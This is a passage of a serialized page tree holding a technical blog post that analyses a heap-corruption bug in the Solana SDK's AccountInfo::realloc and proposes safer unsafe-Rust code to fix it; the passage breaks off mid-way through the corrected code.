",{"type":26,"tag":130,"props":19785,"children":19787},{"className":19786},[],[19788],{"type":32,"value":19789},"solana_program::account_info::Account",{"type":32,"value":19791}," (the trait from earlier) - by ",{"type":26,"tag":41,"props":19793,"children":19796},{"href":19794,"rel":19795},"https://docs.rs/solana-sdk/1.10.28/src/solana_sdk/account.rs.html#661-669",[45],[19797,19799],{"type":32,"value":19798},"returning a reference to the contents of that ",{"type":26,"tag":130,"props":19800,"children":19802},{"className":19801},[],[19803],{"type":32,"value":19804},"Vec",{"type":32,"value":19806},". So, ",{"type":26,"tag":130,"props":19808,"children":19810},{"className":19809},[],[19811],{"type":32,"value":16229},{"type":32,"value":19813}," writes the size into the 8 bytes right before ",{"type":26,"tag":130,"props":19815,"children":19817},{"className":19816},[],[19818],{"type":32,"value":6303},{"type":32,"value":19820},"; ",{"type":26,"tag":130,"props":19822,"children":19824},{"className":19823},[],[19825],{"type":32,"value":6303},{"type":32,"value":19827}," is the buffer of a ",{"type":26,"tag":130,"props":19829,"children":19831},{"className":19830},[],[19832],{"type":32,"value":19804},{"type":32,"value":19834},", and so it is the contents of a heap allocation; and, immediately before a heap allocation sits critical metadata. The result? If, for some reason, you construct an ",{"type":26,"tag":130,"props":19836,"children":19838},{"className":19837},[],[19839],{"type":32,"value":17530},{"type":32,"value":19841}," out of an SDK ",{"type":26,"tag":130,"props":19843,"children":19845},{"className":19844},[],[19846],{"type":32,"value":19739},{"type":32,"value":19848}," and then realloc it (which admittedly is quite a stretch), then you get heap corruption - something that's very likely to lead to remote code execution.",{"type":26,"tag":92,"props":19850,"children":19852},{"id":19851},"remediation",[19853],{"type":32,"value":19854},"Remediation",{"type":26,"tag":35,"props":19856,"children":19857},{},[19858],{"type":32,"value":19859},"Obviously the fix for the main issue at hand is to check that the resize operation remains in-bounds. But how do we know how big is too big?",{"type":26,"tag":35,"props":19861,"children":19862},{},[19863,19865,19870,19872,19877,19879,19889,19891,19896,19898,19905],{"type":32,"value":19864},"The sensible thing to do would be to store the initial size in the ",{"type":26,"tag":130,"props":19866,"children":19868},{"className":19867},[],[19869],{"type":32,"value":17530},{"type":32,"value":19871},"... except for the fact that the layout of ",{"type":26,"tag":130,"props":19873,"children":19875},{"className":19874},[],[19876],{"type":32,"value":17530},{"type":32,"value":19878}," is actually part of the ABI between the contract runtime and the loader :face_palm:",{"type":26,"tag":18065,"props":19880,"children":19881},{},[19882],{"type":26,"tag":41,"props":19883,"children":19887},{"href":19884,"ariaDescribedBy":19885,"dataFootnoteRef":7,"id":19886},"#user-content-fn-layout",[18072],"user-content-fnref-layout",[19888],{"type":32,"value":344},{"type":32,"value":19890}," So, with changing ",{"type":26,"tag":130,"props":19892,"children":19894},{"className":19893},[],[19895],{"type":32,"value":17530},{"type":32,"value":19897}," out of the question, the Solana team came up with a different place to stash the information: inside a section of padding in the serialized buffer passed from the runtime. This happened to be next to where the pubkey was stored, which resulted in the creation of ",{"type":26,"tag":41,"props":19899,"children":19902},{"href":19900,"rel":19901},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#74-85",[45],[19903],{"type":32,"value":19904},"this function",{"type":32,"value":7072},{"type":26,"tag":5512,"props":19907,"children":19909},{"className":5552,"code":19908,"language":5551,"meta":7,"style":7},"/// Return the account's original data length when it was serialized for the\n/// current program invocation.\n///\n/// # Safety\n///\n/// This method assumes that the original data length was serialized as a u32\n/// integer in the 4 bytes immediately preceding the serialized account key.\npub unsafe fn original_data_len(&self) -> usize {\n    let key_ptr = self.key as *const _ as *const u8;\n    let original_data_len_ptr = key_ptr.offset(-4) as *const u32;\n    *original_data_len_ptr as usize\n}\n",[19910],{"type":26,"tag":130,"props":19911,"children":19912},{"__ignoreMap":7},[19913,19921,19929,19937,19945,19952,19960,19968,20016,20081,20146,20167],{"type":26,"tag":137,"props":19914,"children":19915},{"class":5559,"line":5560},[19916],{"type":26,"tag":137,"props":19917,"children":19918},{"style":5564},[19919],{"type":32,"value":19920},"/// Return the account's original data length when it was serialized for the\n",{"type":26,"tag":137,"props":19922,"children":19923},{"class":5559,"line":5412},[19924],{"type":26,"tag":137,"props":19925,"children":19926},{"style":5564},[19927],{"type":32,"value":19928},"/// current program invocation.\n",{"type":26,"tag":137,"props":19930,"children":19931},{"class":5559,"line":5417},[19932],{"type":26,"tag":137,"props":19933,"children":19934},{"style":5564},[19935],{"type":32,"value":19936},"///\n",{"type":26,"tag":137,"props":19938,"children":19939},{"class":5559,"line":5642},[19940],{"type":26,"tag":137,"props":19941,"children":19942},{"style":5564},[19943],{"type":32,"value":19944},"/// # Safety\n",{"type":26,"tag":137,"props":19946,"children":19947},{"class":5559,"line":5745},[19948],{"type":26,"tag":137,"props":19949,"children":19950},{"style":5564},[19951],{"type":32,"value":19936},{"type":26,"tag":137,"props":19953,"children":19954},{"class":5559,"line":5850},[19955],{"type":26,"tag":137,"props":19956,"children":19957},{"style":5564},[19958],{"type":32,"value":19959},"/// This method assumes that the original data length was serialized as a u32\n",{"type":26,"tag":137,"props":19961,"children":19962},{"class":5559,"line":5878},[19963],{"type":26,"tag":137,"props":19964,"children":19965},{"style":5564},[19966],{"type":32,"value":19967},"/// integer in the 4 bytes immediately preceding the serialized account key.\n",{"type":26,"tag":137,"props":19969,"children":19970},{"class":5559,"line":5891},[19971,19975,19979,19983,19988,19992,19996,20000,20004,20008,20012],{"type":26,"tag":137,"props":19972,"children":19973},{"style":5573},[19974],{"type":32,"value":16281},{"type":26,"tag":137,"props":19976,"children":19977},{"style":5573},[19978],{"type":32,"value":17181},{"type":26,"tag":137,"props":19980,"children":19981},{"style":5573},[19982],{"type":32,"value":16286},{"type":26,"tag":137,"props":19984,"children":19985},{"style":5682},[19986],{"type":32,"value":19987}," original_data_len",{"type":26,"tag":137,"props":19989,"children":19990},{"style":5601},[19991],{"type":32,"value":165},{"type":26,"tag":137,"props":19993,"children":19994},{"style":5590},[19995],{"type":32,"value":5694},{"type":26,"tag":137,"props":19997,"children":19998},{"style":5573},[19999],{"type":32,"value":16304},{"type":26,"tag":137,"props":20001,"children":20002},{"style":5601},[20003],{"type":32,"value":5671},{"type":26,"tag":137,"props":20005,"children":20006},{"style":5590},[20007],{"type":32,"value":16348},{"type":26,"tag":137,"props":20009,"children":20010},{"style":6009},[20011],{"type":32,"value":16322},{"type":26,"tag":137,"props":20013,"children":20014},{"style":5601},[20015],{"type":32,"value":5875},{"type":26,"tag":137,"props":20017,"children":20018},{"class":5559,"line":5909},[20019,20023,20028,20032,20036,20040,20045,20049,20053,20057,20061,20065,20069,20073,20077],{"type":26,"tag":137,"props":20020,"children":20021},{"style":5573},[20022],{"type":32,"value":5576},{"type":26,"tag":137,"props":20024,"children":20025},{"style":5584},[20026],{"type":32,"value":20027}," key_ptr",{"type":26,"tag":137,"props":20029,"children":20030},{"style":5590},[20031],{"type":32,"value":5593},{"type":26,"tag":137,"props":20033,"children":20034},{"style":5573},[20035],{"type":32,"value":16388},{"type":26,"tag":137,"props":20037,"children":20038},{"style":5590},[20039],{"type":32,"value":470},{"type":26,"tag":137,"props":20041,"children":20042},{"style":5601},[20043],{"type":32,"value":20044},"key ",{"type":26,"tag":137,"props":20046,"children":20047},{"style":5573},[20048],{"type":32,"value":11428},{"type":26,"tag":137,"props":20050,"children":20051},{"style":5590},[20052],{"type":32,"value":12406},{"type":26,"tag":137,"props":20054,"children":20055},{"style":5573},[20056],{"type":32,"value":12244},{"type":26,"tag":137,"props":20058,"children":20059},{"style":5584},[20060],{"type":32,"value":5618},{"type":26,"tag":137,"props":20062,"children":20063},{"style":5573},[20064],{"type":32,"value":11414},{"type":26,"tag":137,"props":20066,"children":20067},{"style":5590},[20068],{"type":32,"value":12406},{"type":26,"tag":137,"props":20070,"children":20071},{"style":5573},[20072],{"type":32,"value":12244},{"type":26,"tag":137,"props":20074,"children":20075},{"style":6009},[20076],{"type":32,"value":17225},{"type":26,"tag":137,"props":20078,"children":20079},{"style":5601},[20080],{"type":32,"value":5604},{"type":26,"tag":137,"props":20082,"children":20083},{"class":5559,"line":5930},[20084,20088,20093,20097,20101,20105,20109,20113,20117,20121,20125,20129,20133,20137,20142],{"type":26,"tag":137,"props":20085,"children":20086},{"style":5573},[20087],{"type":32,"value":5576},{"type":26,"tag":137,"props":20089,"children":20090},{"style":5584},[20091],{"type":32,"value":20092}," original_data_len_ptr",{"type":26,"tag":137,"props":20094,"children":20095},{"style":5590},[20096],{"type":32,"value":5593},{"type":26,"tag":137,"props":20098,"children":20099},{"style":5584},[20100],{"type":32,"value":20027},{"type":26,"tag":137,"props":20102,"children":20103},{"style":5590},[20104],{"type":32,"value":470},{"type":26,"tag":137,"props":20106,"children":20107},{"style":5682},[20108],{"type":32,"value":16492},{"type":26,"tag":137,"props":20110,"children":20111},{"style":5601},[20112],{"type":32,"value":165},{"type":26,"tag":137,"props":20114,"children":20115},{"style":5590},[20116],{"type":32,"value":6908},{"type":26,"tag":137,"props":20118,"children":20119},{"style":5626},[20120],{"type":32,"value":3235},{"type":26,"tag":137,"props":20122,"children":20123},{"style":5601},[20124],{"type":32,"value":5671},{"type":26,"tag":137,"props":20126,"children":20127},{"style":5573},[20128],{"type":32,"value":11428},{"type":26,"tag":137,"props":20130,"children":20131},{"style":5590},[20132],{"type":32,"value":12406},{"type":26,"tag":137,"props":20134,"children":20135},{"style":5573},[20136],{"type":32,"value":12244},{"type":26,"tag":137,"props":20138,"children":20139},{"style":6009},[20140],{"type":32,"value":20141}," u32",{"type":26,"tag":137,"props":20143,"children":20144},{"style":5601},[20145],{"type":32,"value":5604},{"type":26,"tag":137,"props":20147,"children":20148},{"class":5559,"line":5939},[20149,20154,20159,20163],{"type":26,"tag":137,"props":20150,"children":20151},{"style":5590},[20152],{"type":32,"value":20153},"    *",{"type":26,"tag":137,"props":20155,"children":20156},{"style":5584},[20157],{"type":32,"value":20158},"original_data_len_ptr",{"type":26,"tag":137,"props":20160,"children":20161},{"style":5573},[20162],{"type":32,"value":11414},{"type":26,"tag":137,"props":20164,"children":20165},{"style":6009},[20166],{"type":32,"value":19567},{"type":26,"tag":137,"props":20168,"children":20169},{"class":5559,"line":6191},[20170],{"type":26,"tag":137,"props":20171,"children":20172},{"style":5601},[20173],{"type":32,"value":6507},{"type":26,"tag":35,"props":20175,"children":20176},{},[20177,20179,20184,20186,20191,20193,20198,20200,20205,20207,20214,20216,20223,20224,20231,20232,20239,20240,20247],{"type":32,"value":20178},"It's marked ",{"type":26,"tag":130,"props":20180,"children":20182},{"className":20181},[],[20183],{"type":32,"value":16947},{"type":32,"value":20185},", properly documented, but there's just one problem: we need this for ",{"type":26,"tag":130,"props":20187,"children":20189},{"className":20188},[],[20190],{"type":32,"value":16229},{"type":32,"value":20192},", which originally was not ",{"type":26,"tag":130,"props":20194,"children":20196},{"className":20195},[],[20197],{"type":32,"value":16947},{"type":32,"value":20199},". So, in the name of not breaking API compatibility, the Solana team just threw the call in an ",{"type":26,"tag":130,"props":20201,"children":20203},{"className":20202},[],[20204],{"type":32,"value":16947},{"type":32,"value":20206}," block and added ",{"type":26,"tag":41,"props":20208,"children":20211},{"href":20209,"rel":20210},"https://docs.rs/solana-program/1.10.30/solana_program/account_info/struct.AccountInfo.html#safety-1",[45],[20212],{"type":32,"value":20213},"a doc comment",{"type":32,"value":20215}," - adding to the ",{"type":26,"tag":41,"props":20217,"children":20220},{"href":20218,"rel":20219},"https://docs.rs/solana-program/1.10.30/solana_program/program/fn.invoke_signed_unchecked.html#safety",[45],[20221],{"type":32,"value":20222},"small",{"type":32,"value":1011},{"type":26,"tag":41,"props":20225,"children":20228},{"href":20226,"rel":20227},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcpy.html#safety",[45],[20229],{"type":32,"value":20230},"pile",{"type":32,"value":1011},{"type":26,"tag":41,"props":20233,"children":20236},{"href":20234,"rel":20235},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memset.html#safety",[45],[20237],{"type":32,"value":20238},"of",{"type":32,"value":1011},{"type":26,"tag":41,"props":20241,"children":20244},{"href":20242,"rel":20243},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcmp.html#safety",[45],[20245],{"type":32,"value":20246},"functions",{"type":32,"value":20248}," that are actually unsafe but aren't marked as such for API compatibility reasons (and the last three - all related to each other - don't even have the comment until version 1.11, which isn't even on mainnet as of the time of writing).",{"type":26,"tag":92,"props":20250,"children":20252},{"id":20251},"towards-safer-unsafe",[20253,20255],{"type":32,"value":20254},"Towards safer ",{"type":26,"tag":130,"props":20256,"children":20258},{"className":20257},[],[20259],{"type":32,"value":16947},{"type":26,"tag":35,"props":20261,"children":20262},{},[20263,20265,20270,20272,20277,20279,20286],{"type":32,"value":20264},"Let's circle back to that main ",{"type":26,"tag":130,"props":20266,"children":20268},{"className":20267},[],[20269],{"type":32,"value":16947},{"type":32,"value":20271}," block inside ",{"type":26,"tag":130,"props":20273,"children":20275},{"className":20274},[],[20276],{"type":32,"value":16229},{"type":32,"value":20278}," for a bit, shall we? As a reminder, it looks like ",{"type":26,"tag":41,"props":20280,"children":20283},{"href":20281,"rel":20282},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#127-136",[45],[20284],{"type":32,"value":20285},"this",{"type":32,"value":7072},{"type":26,"tag":5512,"props":20288,"children":20290},{"className":5552,"code":20289,"language":5551,"meta":7,"style":7},"// realloc\nunsafe {\n    // First set new length in the serialized data\n    let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n    *ptr = new_len as u64;\n\n    // Then set the new length in the local slice\n    let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n    *ptr = new_len as u64;\n}\n",[20291],{"type":26,"tag":130,"props":20292,"children":20293},{"__ignoreMap":7},[20294,20302,20313,20321,20408,20439,20446,20454,20581,20612],{"type":26,"tag":137,"props":20295,"children":20296},{"class":5559,"line":5560},[20297],{"type":26,"tag":137,"props":20298,"children":20299},{"style":5564},[20300],{"type":32,"value":20301},"// realloc\n",{"type":26,"tag":137,"props":20303,"children":20304},{"class":5559,"line":5412},[20305,20309],{"type":26,"tag":137,"props":20306,"children":20307},{"style":5573},[20308],{"type":32,"value":16947},{"type":26,"tag":137,"props":20310,"children":20311},{"style":5601},[20312],{"type":32,"value":5875},{"type":26,"tag":137,"props":20314,"children":20315},{"class":5559,"line":5417},[20316],{"type":26,"tag":137,"props":20317,"children":20318},{"style":5564},[20319],{"type":32,"value":20320},"    // First set new length in the serialized data\n",{"type":26,"tag":137,"props":20322,"children":20323},{"class":5559,"line":5642},[20324,20328,20332,20336,20340,20344,20348,20352,20356,20360,20364,20368,20372,20376,20380,20384,20388,20392,20396,20400,20404],{"type":26,"tag":137,"props":20325,"children":20326},{"style":5573},[20327],{"type":32,"value":5576},{"type":26,"tag":137,"props":20329,"children":20330},{"style":5584},[20331],{"type":32,"value":16448},{"type":26,"tag":137,"props":20333,"children":20334},{"style":5590},[20335],{"type":32,"value":5593},{"type":26,"tag":137,"props":20337,"children":20338},{"style":5573},[20339],{"type":32,"value":16388},{"type":26,"tag":137,"props":20341,"children":20342},{"style":5590},[20343],{"type":32,"value":470},{"type":26,"tag":137,"props":20345,"children":20346},{"style":5682},[20347],{"type":32,"value":16465},{"type":26,"tag":137,"props":20349,"children":20350},{"style":5601},[20351],{"type":32,"value":16470},{"type":26,"tag":137,"props":20353,"children":20354},{"style":5590},[20355],{"type":32,"value":5715},{"type":26,"tag":137,"props":20357,"children":20358},{"style":5682},[20359],{"type":32,"value":16479},{"type":26,"tag":137,"props":20361,"children":20362},{"style":5601},[20363],{"type":32,"value":16470},{"type":26,"tag":137,"props":20365,"children":20366},{"style":5590},[20367],{"type":32,"value":470},{"type":26,"tag":137,"props":20369,"children":20370},{"style":5682},[20371],{"type":32,"value":16492},{"type":26,"tag":137,"props":20373,"children":20374},{"style":5601},[20375],{"type":32,"value":165},{"type":26,"tag":137,"props":20377,"children":20378},{"style":5590},[20379],{"type":32,"value":6908},{"type":26,"tag":137,"props":20381,"children":20382},{"style":5626},[20383],{"type":32,"value":6663},{"type":26,"tag":137,"props":20385,"children":20386},{"style":5601},[20387],{"type":32,"value":5671},{"type":26,"tag":137,"props":20389,"children":20390},{"style":5573},[20391],{"type":32,"value":11428},{"type":26,"tag":137,"props":20393,"children":20394},{"style":5590},[20395],{"type":32,"value":12406},{"type":26,"tag":137,"props":20397,"children":20398},{"style":5573},[20399],{"type":32,"value":6325},{"type":26,"tag":137,"props":20401,"children":20402},{"style":6009},[20403],{"type":32,"value":8445},{"type":26,"tag":137,"props":20405,"children":20406},{"style":5601},[20407],{"type":32,"value":5604},{"type":26,"tag":137,"props":20409,"children":20410},{"class":5559,"line":5745},[20411,20415,20419,20423,20427,20431,20435],{"type":26,"tag":137,"props":20412,"children":20413},{"style":5590},[20414],{"type":32,"value":20153},{"type":26,"tag":137,"props":20416,"children":20417},{"style":5584},[20418],{"type":32,"value":16540},{"type":26,"tag":137,"props":20420,"children":20421},{"style":5590},[20422],{"type":32,"value":5593},{"type":26,"tag":137,"props":20424,"children":20425},{"style":5584},[20426],{"type":32,"value":16549},{"type":26,"tag":137,"props":20428,"children":20429},{"style":5573},[20430],{"type":32,"value":11414},{"type":26,"tag":137,"props":20432,"children":20433},{"style":6009},[20434],{"type":32,"value":8445},{"type":26,"tag":137,"props":20436,"children":20437},{"style":5601},[20438],{"type":32,"value":5604},{"type":26,"tag":137,"props":20440,"children":20441},{"class":5559,"line":5850},[20442],{"type":26,"tag":137,"props":20443,"children":20444},{"emptyLinePlaceholder":18},[20445],{"type":32,"value":6276},{"type":26,"tag":137,"props":20447,"children":20448},{"class":5559,"line":5878},[20449],{"type":26,"tag":137,"props":20450,"children":20451},{"style":5564},[20452],{"type":32,"value":20453},"    // Then set the new length in the local slice\n",{"type":26,"tag":137,"props":20455,"children":20456},{"class":5559,"line":5891},[20457,20461,20465,20469,20473,20477,20481,20485,20489,20493,20497,20501,20505,20509,20513,20517,20521,20525,20529,20533,20537,20541,20545,20549,20553,20557,20561,20565,20569,20573,20577],{"type":26,"tag":137,"props":20458,"children":20459},{"style":5573},[20460],{"type":32,"value":5576},{"type":26,"tag":137,"props":20462,"children":20463},{"style":5584},[20464],{"type":32,"value":16448},{"type":26,"tag":137,"props":20466,"children":20467},{"style":5590},[20468],{"type":32,"value":5593},{"type":26,"tag":137,"props":20470,"children":20471},{"style":5590},[20472],{"type":32,"value":9725},{"type":26,"tag":137,"props":20474,"children":20475},{"style":5573},[20476],{"type":32,"value":6325},{"type":26,"tag":137,"props":20478,"children":20479},{"style":5590},[20480],{"type":32,"value":12406},{"type":26,"tag":137,"props":20482,"children":20483},{"style":5601},[20484],{"type":32,"value":16608},{"type":26,"tag":137,"props":20486,"children":20487},{"style":5573},[20488],{"type":32,"value":16304},{"type":26,"tag":137,"props":20490,"children":20491},{"style":5590},[20492],{"type":32,"value":470},{"type":26,"tag":137,"props":20494,"children":20495},{"style":5601},[20496],{"type":32,"value":6303},{"type":26,"tag":137,"props":20498,"children":20499},{"style":5590},[20500],{"type":32,"value":470},{"type":26,"tag":137,"props":20502,"children":20503},{"style":5682},[20504],{"type":32,"value":16629},{"type":26,"tag":137,"props":20506,"children":20507},{"style":5601},[20508],{"type":32,"value":16634},{"type":26,"tag":137,"props":20510,"children":20511},{"style":5573},[20512],{"type":32,"value":11428},{"type":26,"tag":137,"props":20514,"children":20515},{"style":5590},[20516],{"type":32,"value":12406},{"type":26,"tag":137,"props":20518,"children":20519},{"style":5573},[20520],{"type":32,"value":12244},{"type":26,"tag":137,"props":20522,"children":20523},{"style":6009},[20524],{"type":32,"value":8445},{"type":26,"tag":137,"props":20526,"children":20527},{"style":5601},[20528],{"type":32,"value":200},{"type":26,"tag":137,"props":20530,"children":20531},{"style":5590},[20532],{"type":32,"value":470},{"type":26,"tag":137,"props":20534,"children":20535},{"style":5682},[20536],{"type":32,"value":16492},{"type":26,"tag":137,"props":20538,"children":20539},{"style":5601},[20540],{"type":32,"value":165},{"type":26,"tag":137,"props":20542,"children":20543},{"style":5626},[20544],{"type":32,"value":878},{"type":26,"tag":137,"props":20546,"children":20547},{"style":5601},[20548],{"type":32,"value":5671},{"type":26,"tag":137,"props":20550,"children":20551},{"style":5573},[20552],{"type":32,"value":11428},{"type":26,"tag":137,"props":20554,"children":20555},{"style":6009},[20556],{"type":32,"value":8445},{"type":26,"tag":137,"props":20558,"children":20559},{"style":5601},[20560],{"type":32,"value":5671},{"type":26,"tag":137,"props":20562,"children":20563},{"style":5573},[20564],{"type":32,"value":11428},{"type":26,"tag":137,"props":20566,"children":20567},{"style":5590},[20568],{"type":32,"value":12406},{"type":26,"tag":137,"props":20570,"children":20571},{"style":5573},[20572],{"type":32,"value":6325},{"type":26,"tag":137,"props":20574,"children":20575},{"style":6009},[20576],{"type":32,"value":8445},{"type":26,"tag":137,"props":20578,"children":20579},{"style":5601},[20580],{"type":32,"value":6430},{"type":26,"tag":137,"props":20582,"children":20583},{"class":5559,"line":5909},[20584,20588,20592,20596,20600,20604,20608],{"type":26,"tag":137,"props":20585,"children":20586},{"style":5590},[20587],{"type":32,"value":20153},{"type":26,"tag":137,"props":20589,"children":20590},{"style":5584},[20591],{"type":32,"value":16540},{"type":26,"tag":137,"props":20593,"children":20594},{"style":5590},[20595],{"type":32,"value":5593},{"type":26,"tag":137,"props":20597,"children":20598},{"style":5584},[20599],{"type":32,"value":16549},{"type":26,"tag":137,"props":20601,"children":20602},{"style":5573},[20603],{"type":32,"value":11414},{"type":26,"tag":137,"props":20605,"children":20606},{"style":6009},[20607],{"type":32,"value":8445},{"type":26,"tag":137,"props":20609,"children":20610},{"style":5601},[20611],{"type":32,"value":5604},{"type":26,"tag":137,"props":20613,"children":20614},{"class":5559,"line":5930},[20615],{"type":26,"tag":137,"props":20616,"children":20617},{"style":5601},[20618],{"type":32,"value":6507},{"type":26,"tag":35,"props":20620,"children":20621},{},[20622,20624,20629],{"type":32,"value":20623},"We've seen how we could have ran into all sorts of issues here, with the usage of slice layout details, the reborrow creating an unbounded lifetime, and the ",{"type":26,"tag":130,"props":20625,"children":20627},{"className":20626},[],[20628],{"type":32,"value":18095},{"type":32,"value":20630}," borrow not accurately representing the actual usage of its contents. We can do better than this.",{"type":26,"tag":35,"props":20632,"children":20633},{},[20634,20636,20641,20643,20648,20650,20655,20657,20662,20664,20669,20671,20677,20679,20689,20691,20702],{"type":32,"value":20635},"First, let's deal with the ",{"type":26,"tag":130,"props":20637,"children":20639},{"className":20638},[],[20640],{"type":32,"value":18095},{"type":32,"value":20642}," borrowing issue. When we ",{"type":26,"tag":130,"props":20644,"children":20646},{"className":20645},[],[20647],{"type":32,"value":16465},{"type":32,"value":20649},", we get a ",{"type":26,"tag":130,"props":20651,"children":20653},{"className":20652},[],[20654],{"type":32,"value":19334},{"type":32,"value":20656}," back, which represents our borrow of the ",{"type":26,"tag":130,"props":20658,"children":20660},{"className":20659},[],[20661],{"type":32,"value":18095},{"type":32,"value":20663},"'s data. The fix here is simple: keep that ",{"type":26,"tag":130,"props":20665,"children":20667},{"className":20666},[],[20668],{"type":32,"value":19334},{"type":32,"value":20670}," around and use it to access the data, instead of using ",{"type":26,"tag":130,"props":20672,"children":20674},{"className":20673},[],[20675],{"type":32,"value":20676},"RefCell::as_ptr",{"type":32,"value":20678},". Next, the slice; again, the fix is simple. Instead of attempting to modify just the length field, and resorting to using layout information to do so since Rust slices are immutable, we can simply construct a new slice reference and set that. The Rust compiler",{"type":26,"tag":18065,"props":20680,"children":20681},{},[20682],{"type":26,"tag":41,"props":20683,"children":20687},{"href":20684,"ariaDescribedBy":20685,"dataFootnoteRef":7,"id":20686},"#user-content-fn-rustc-llvm",[18072],"user-content-fnref-rustc-llvm",[20688],{"type":32,"value":3235},{"type":32,"value":20690}," is smart enough to realize that the only thing changing is the length field, and so only emits the code to set the length",{"type":26,"tag":18065,"props":20692,"children":20693},{},[20694],{"type":26,"tag":41,"props":20695,"children":20699},{"href":20696,"ariaDescribedBy":20697,"dataFootnoteRef":7,"id":20698},"#user-content-fn-godbolt",[18072],"user-content-fnref-godbolt",[20700],{"type":32,"value":20701},"5",{"type":32,"value":20703},". So then we get:",{"type":26,"tag":5512,"props":20705,"children":20707},{"className":5552,"code":20706,"language":5551,"meta":7,"style":7},"let mut slice = self.try_borrow_mut_data()?;\n\n// First set new length in the serialized data\nlet ptr = unsafe { slice.as_mut_ptr().offset(-8) } as *mut u64;\nunsafe { *ptr = new_len as u64 };\n\n// Then set the new length in the local slice\n*slice = unsafe { std::slice::from_raw_parts_mut(slice.as_mut_ptr(), new_len) };\n",[20708],{"type":26,"tag":130,"props":20709,"children":20710},{"__ignoreMap":7},[20711,20755,20762,20769,20853,20893,20900,20907],{"type":26,"tag":137,"props":20712,"children":20713},{"class":5559,"line":5560},[20714,20718,20722,20727,20731,20735,20739,20743,20747,20751],{"type":26,"tag":137,"props":20715,"children":20716},{"style":5573},[20717],{"type":32,"value":14378},{"type":26,"tag":137,"props":20719,"children":20720},{"style":5573},[20721],{"type":32,"value":5581},{"type":26,"tag":137,"props":20723,"children":20724},{"style":5584},[20725],{"type":32,"value":20726}," slice",{"type":26,"tag":137,"props":20728,"children":20729},{"style":5590},[20730],{"type":32,"value":5593},{"type":26,"tag":137,"props":20732,"children":20733},{"style":5573},[20734],{"type":32,"value":16388},{"type":26,"tag":137,"props":20736,"children":20737},{"style":5590},[20738],{"type":32,"value":470},{"type":26,"tag":137,"props":20740,"children":20741},{"style":5682},[20742],{"type":32,"value":16465},{"type":26,"tag":137,"props":20744,"children":20745},{"style":5601},[20746],{"type":32,"value":16470},{"type":26,"tag":137,"props":20748,"children":20749},{"style":5590},[20750],{"type":32,"value":5737},{"type":26,"tag":137,"props":20752,"children":20753},{"style":5601},[20754],{"type":32,"value":5604},{"type":26,"tag":137,"props":20756,"children":20757},{"class":5559,"line":5412},[20758],{"type":26,"tag":137,"props":20759,"children":20760},{"emptyLinePlaceholder":18},[20761],{"type":32,"value":6276},{"type":26,"tag":137,"props":20763,"children":20764},{"class":5559,"line":5417},[20765],{"type":26,"tag":137,"props":20766,"children":20767},{"style":5564},[20768],{"type":32,"value":16994},{"type":26,"tag":137,"props":20770,"children":20771},{"class":5559,"line":5642},[20772,20776,20780,20784,20788,20792,20796,20800,20804,20808,20812,20816,20820,20824,20828,20833,20837,20841,20845,20849],{"type":26,"tag":137,"props":20773,"children":20774},{"style":5573},[20775],{"type":32,"value":14378},{"type":26,"tag":137,"props":20777,"children":20778},{"style":5584},[20779],{"type":32,"value":16448},{"type":26,"tag":137,"props":20781,"children":20782},{"style":5590},[20783],{"type":32,"value":5593},{"type":26,"tag":137,"props":20785,"children":20786},{"style":5573},[20787],{"type":32,"value":17181},{"type":26,"tag":137,"props":20789,"children":20790},{"style":5601},[20791],{"type":32,"value":12175},{"type":26,"tag":137,"props":20793,"children":20794},{"style":5584},[20795],{"type":32,"value":17905},{"type":26,"tag":137,"props":20797,"children":20798},{"style":5590},[20799],{"type":32,"value":470},{"type":26,"tag":137,"props":20801,"children":20802},{"style":5682},[20803],{"type":32,"value":16479},{"type":26,"tag":137,"props":20805,"children":20806},{"style":5601},[20807],{"type":32,"value":16470},{"type":26,"tag":137,"props":20809,"children":20810},{"style":5590},[20811],{"type":32,"value":470},{"type":26,"tag":137,"props":20813,"children":20814},{"style":5682},[20815],{"type":32,"value":16492},{"type":26,"tag":137,"props":20817,"children":20818},{"style":5601},[20819],{"type":32,"value":165},{"type":26,"tag":137,"props":20821,"children":20822},{"style":5590},[20823],{"type":32,"value":6908},{"type":26,"tag":137,"props":20825,"children":20826},{"style":5626},[20827],{"type":32,"value":6663},{"type":26,"tag":137,"props":20829,"children":20830},{"style":5601},[20831],{"type":32,"value":20832},") } ",{"type":26,"tag":137,"props":20834,"children":20835},{"style":5573},[20836],{"type":32,"value":11428},{"type":26,"tag":137,"props":20838,"children":20839},{"style":5590},[20840],{"type":32,"value":12406},{"type":26,"tag":137,"props":20842,"children":20843},{"style":5573},[20844],{"type":32,"value":6325},{"type":26,"tag":137,"props":20846,"children":20847},{"style":6009},[20848],{"type":32,"value":8445},{"type":26,"tag":137,"props":20850,"children":20851},{"style":5601},[20852],{"type":32,"value":5604},{"type":26,"tag":137,"props":20854,"children":20855},{"class":5559,"line":5745},[20856,20860,20864,20868,20872,20876,20880,20884,20888],{"type":26,"tag":137,"props":20857,"children":20858},{"style":5573},[20859],{"type":32,"value":16947},{"type":26,"tag":137,"props":20861,"children":20862},{"style":5601},[20863],{"type":32,"value":12175},{"type":26,"tag":137,"props":20865,"children":20866},{"style":5590},[20867],{"type":32,"value":7152},{"type":26,"tag":137,"props":20869,"children":20870},{"style":5584},[20871],{"type":32,"value":16540},{"type":26,"tag":137,"props":20873,"children":20874},{"style":5590},[20875],{"type":32,"value":5593},{"type":26,"tag":137,"props":20877,"children":20878},{"style":5584},[20879],{"type":32,"value":16549},{"type":26,"tag":137,"props":20881,"children":20882},{"style":5573},[20883],{"type":32,"value":11414},{"type":26,"tag":137,"props":20885,"children":20886},{"style":6009},[20887],{"type":32,"value":8445},{"type":26,"tag":137,"props":20889,"children":20890},{"style":5601},[20891],{"type":32,"value":20892}," 